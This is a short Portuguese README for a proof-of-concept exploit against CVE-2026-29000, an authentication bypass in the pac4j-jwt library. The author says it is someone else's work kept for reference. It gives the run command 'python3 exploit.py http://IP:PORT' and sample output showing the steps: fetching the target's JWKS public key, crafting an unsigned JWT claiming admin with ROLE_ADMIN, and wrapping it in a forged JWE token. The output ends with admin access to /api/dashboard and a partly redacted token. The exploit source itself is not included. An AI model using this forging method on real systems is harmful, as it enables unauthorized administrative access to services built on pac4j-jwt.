
Prova de conceito de exploit para CVE-2026-29000, uma bypass de autenticação no pac4j-jwt. Forja tokens JWT para obter acesso de administrador a endpoints protegidos.
Nota: Este não é meu trabalho original. Estou mantendo-o aqui como referência.
Metodologia de trabalho:
python3 exploit.py http://IP:PORT
[*] Buscando JWKS...
[+] Chave pública RSA obtida (kid: enc-key-1)
[*] PlainJWT criado com sub=admin, role=ROLE_ADMIN
[+] Token JWE forjado criado
[*] Acessando /api/dashboard...
[+] Status: 200
[+] Autenticado como: admin (ROLE_ADMIN)
[+] Token: eyJhbGciOiAiUlN_.....[Redacted].....D4zwSEY05lFkCB.J933HR-irY6a0r2uivRLZw